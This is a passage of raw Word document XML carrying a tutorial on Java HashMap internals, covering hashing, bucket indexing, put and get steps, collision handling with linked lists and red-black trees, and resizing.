          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06574916" w14:textId="77777777" w:rsidR="00720C6F" w:rsidRPr="00CE4B95" w:rsidRDefault="00720C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430405"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    V </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>value</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9B7448" w14:textId="77777777" w:rsidR="00720C6F" w:rsidRPr="00CE4B95" w:rsidRDefault="00720C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430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Node</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V</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x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for handling collisions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47DACEB6" w14:textId="05424918" w:rsidR="00720C6F" w:rsidRPr="00CE4B95" w:rsidRDefault="00720C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430405"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2F8341" w14:textId="77777777" w:rsidR="009F342F" w:rsidRPr="00CE4B95" w:rsidRDefault="009F342F" w:rsidP="009F342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nally, HashMap maintains:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38CB0757" w14:textId="77777777" w:rsidR="009F342F" w:rsidRPr="00CE4B95" w:rsidRDefault="009F342F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="72"/>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n </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>array of Node&lt;K, V&gt;[]</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> called table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE56D52" w14:textId="77777777" w:rsidR="009F342F" w:rsidRPr="00CE4B95" w:rsidRDefault="009F342F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="72"/>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ach Node</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> stores a key, value, hash, and reference to the next node (linked list)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9FBF06" w14:textId="77777777" w:rsidR="009F342F" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="009F342F">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AF2DDE">
          <v:rect id="_x0000_i1511" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E703A06" w14:textId="77777777" w:rsidR="009F342F" w:rsidRPr="00CE4B95" w:rsidRDefault="009F342F" w:rsidP="009F342F">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How put(key, value) Works</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="226EC0F0" w14:textId="77777777" w:rsidR="009F342F" w:rsidRPr="00CE4B95" w:rsidRDefault="009F342F" w:rsidP="009F342F">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ep-by-step:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DEC78FA" w14:textId="77777777" w:rsidR="009F342F" w:rsidRPr="00CE4B95" w:rsidRDefault="009F342F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="73"/>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ute Hash:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A22BFEB" w14:textId="3F89560F" w:rsidR="001E61F8" w:rsidRPr="00CE4B95" w:rsidRDefault="001E61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0400916"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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hash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has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key</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2982790B" w14:textId="77777777" w:rsidR="009F342F" w:rsidRPr="00CE4B95" w:rsidRDefault="009F342F" w:rsidP="009F342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Java enhances the hashCode with a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>hash spreading function</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252F1656" w14:textId="77777777" w:rsidR="001E61F8" w:rsidRPr="00CE4B95" w:rsidRDefault="001E61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3991186"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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hash</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Object</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> ke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A789CE3" w14:textId="77777777" w:rsidR="001E61F8" w:rsidRPr="00CE4B95" w:rsidRDefault="001E61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39911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h</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20277A6C" w14:textId="77777777" w:rsidR="001E61F8" w:rsidRPr="00CE4B95" w:rsidRDefault="001E61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39911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ke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h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ke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hashCod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h </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&gt;&g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6</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29DE094C" w14:textId="487DA742" w:rsidR="001E61F8" w:rsidRPr="00CE4B95" w:rsidRDefault="001E61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3991186"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42795471" w14:textId="77777777" w:rsidR="009F342F" w:rsidRPr="00CE4B95" w:rsidRDefault="009F342F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="73"/>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nd Bucket Index:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F730118" w14:textId="536D9E76" w:rsidR="00C05ABC" w:rsidRPr="00CE4B95" w:rsidRDefault="00C05A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5421633"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">index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amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> hash</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1570B533" w14:textId="77777777" w:rsidR="009F342F" w:rsidRPr="00CE4B95" w:rsidRDefault="009F342F" w:rsidP="009F342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 is the length of the array (must be a power of 2 for performance).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE42299" w14:textId="77777777" w:rsidR="009F342F" w:rsidRPr="00CE4B95" w:rsidRDefault="009F342F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="73"/>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heck Bucket:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0FFC7C" w14:textId="77777777" w:rsidR="009F342F" w:rsidRPr="00CE4B95" w:rsidRDefault="009F342F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="73"/>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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, create new node at index</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1655DDAB" w14:textId="77777777" w:rsidR="009F342F" w:rsidRPr="00CE4B95" w:rsidRDefault="009F342F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="73"/>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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>occupied</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (collision):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77259A92" w14:textId="77777777" w:rsidR="009F342F" w:rsidRPr="00CE4B95" w:rsidRDefault="009F342F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="73"/>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averse linked list or tree at that index</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A7CEBE" w14:textId="77777777" w:rsidR="009F342F" w:rsidRPr="00CE4B95" w:rsidRDefault="009F342F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="73"/>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key exists (checked via equals()), update value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B34B07" w14:textId="77777777" w:rsidR="009F342F" w:rsidRPr="00CE4B95" w:rsidRDefault="009F342F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="73"/>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lse, add new node (as next in list or as tree node)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71523D0F" w14:textId="77777777" w:rsidR="009F342F" w:rsidRPr="00CE4B95" w:rsidRDefault="009F342F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="73"/>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ize if Needed:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> If number of entries exceeds threshold = capacity * loadFactor, rehash (resize).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AFD4967" w14:textId="77777777" w:rsidR="009F342F" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="009F342F">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E7F71B9">
          <v:rect id="_x0000_i1512" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F5F66B" w14:textId="77777777" w:rsidR="009F342F" w:rsidRPr="00CE4B95" w:rsidRDefault="009F342F" w:rsidP="009F342F">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How get(key) Works</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FB4668" w14:textId="77777777" w:rsidR="009F342F" w:rsidRPr="00CE4B95" w:rsidRDefault="009F342F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="74"/>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ute hash of the key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C8CDF6" w14:textId="77777777" w:rsidR="009F342F" w:rsidRPr="00CE4B95" w:rsidRDefault="009F342F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="74"/>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et index = (n - 1) &amp; hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37922977" w14:textId="77777777" w:rsidR="009F342F" w:rsidRPr="00CE4B95" w:rsidRDefault="009F342F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="74"/>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Traverse list or tree at that index:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4D7E90" w14:textId="77777777" w:rsidR="009F342F" w:rsidRPr="00CE4B95" w:rsidRDefault="009F342F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="74"/>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are hash and use equals() to find the correct key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20FD4D54" w14:textId="77777777" w:rsidR="009F342F" w:rsidRPr="00CE4B95" w:rsidRDefault="009F342F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="74"/>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 value if key found, else return null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="308C6276" w14:textId="77777777" w:rsidR="009F342F" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="009F342F">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A3A720A">
          <v:rect id="_x0000_i1513" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="14AA25A2" w14:textId="77777777" w:rsidR="009F342F" w:rsidRPr="00CE4B95" w:rsidRDefault="009F342F" w:rsidP="009F342F">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llision Handling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E726661" w14:textId="77777777" w:rsidR="009F342F" w:rsidRPr="00CE4B95" w:rsidRDefault="009F342F" w:rsidP="009F342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two keys hash to the same index:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65CE8FB9" w14:textId="77777777" w:rsidR="009F342F" w:rsidRPr="00CE4B95" w:rsidRDefault="009F342F" w:rsidP="009F342F">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Java 7 and before:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="406C890B" w14:textId="77777777" w:rsidR="009F342F" w:rsidRPr="00CE4B95" w:rsidRDefault="009F342F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="75"/>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 List</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in each bucket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED246DC" w14:textId="77777777" w:rsidR="009F342F" w:rsidRPr="00CE4B95" w:rsidRDefault="009F342F" w:rsidP="009F342F">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Java 8 and after:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F533ED" w14:textId="77777777" w:rsidR="009F342F" w:rsidRPr="00CE4B95" w:rsidRDefault="009F342F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="76"/>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 List</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> used </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>until 8 entries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D5C1F1" w14:textId="77777777" w:rsidR="009F342F" w:rsidRPr="00CE4B95" w:rsidRDefault="009F342F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="76"/>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entries in a bucket &gt; 8 and capacity &gt; 64, it converts list to a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Red-Black Tree</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for faster lookup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537E3941" w14:textId="77777777" w:rsidR="009F342F" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="009F342F">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F35CD70">
          <v:rect id="_x0000_i1514" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C675273" w14:textId="77777777" w:rsidR="009F342F" w:rsidRPr="00CE4B95" w:rsidRDefault="009F342F" w:rsidP="009F342F">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esizing (Rehashing)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D2C578" w14:textId="77777777" w:rsidR="009F342F" w:rsidRPr="00CE4B95" w:rsidRDefault="009F342F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="77"/>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size &gt; capacity * loadFactor (default loadFactor = 0.75)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AEE4F35" w14:textId="77777777" w:rsidR="009F342F" w:rsidRPr="00CE4B95" w:rsidRDefault="009F342F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="77"/>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rray is resized to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>double the size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63616A16" w14:textId="77777777" w:rsidR="009F342F" w:rsidRPr="00CE4B95" w:rsidRDefault="009F342F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="77"/>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ll entries are </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>rehashed</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moved to new positions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B2FB2EC" w14:textId="77777777" w:rsidR="009F342F" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="009F342F">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E17196F">
          <v:rect id="_x0000_i1515" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FEFD4E9" w14:textId="77777777" w:rsidR="009F342F" w:rsidRPr="00CE4B95" w:rsidRDefault="009F342F" w:rsidP="009F342F">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36E366AF" w14:textId="77777777" w:rsidR="00C05ABC" w:rsidRPr="00CE4B95" w:rsidRDefault="00C05A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5103333"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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p>
    <w:p w14:paraId="4CE71FC4" w14:textId="77777777" w:rsidR="00C05ABC" w:rsidRPr="00CE4B95" w:rsidRDefault="00C05A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5103333"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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lice"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6101F181" w14:textId="73DB55B9" w:rsidR="00C05ABC" w:rsidRPr="00CE4B95" w:rsidRDefault="00C05A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5103333"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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cit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London"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0633A580" w14:textId="77777777" w:rsidR="009F342F" w:rsidRPr="00CE4B95" w:rsidRDefault="009F342F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="78"/>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ame".hashCode() → hash → index</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0660E377" w14:textId="77777777" w:rsidR="009F342F" w:rsidRPr="00CE4B95" w:rsidRDefault="009F342F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="78"/>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ored in table[index] as a node</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E02F60A" w14:textId="77777777" w:rsidR="009F342F" w:rsidRPr="00CE4B95" w:rsidRDefault="009F342F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="78"/>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city" hashes to same index, a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>collision</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> occurs, and it's linked</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A5C51B" w14:textId="77777777" w:rsidR="009F342F" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="009F342F">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7375F56">
          <v:rect id="_x0000_i1516" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C879718" w14:textId="77777777" w:rsidR="009F342F" w:rsidRPr="00CE4B95" w:rsidRDefault="009F342F" w:rsidP="009F342F">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 of Internal Logi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0"/>
        <w:gridCol w:w="3501"/>
      </w:tblGrid>
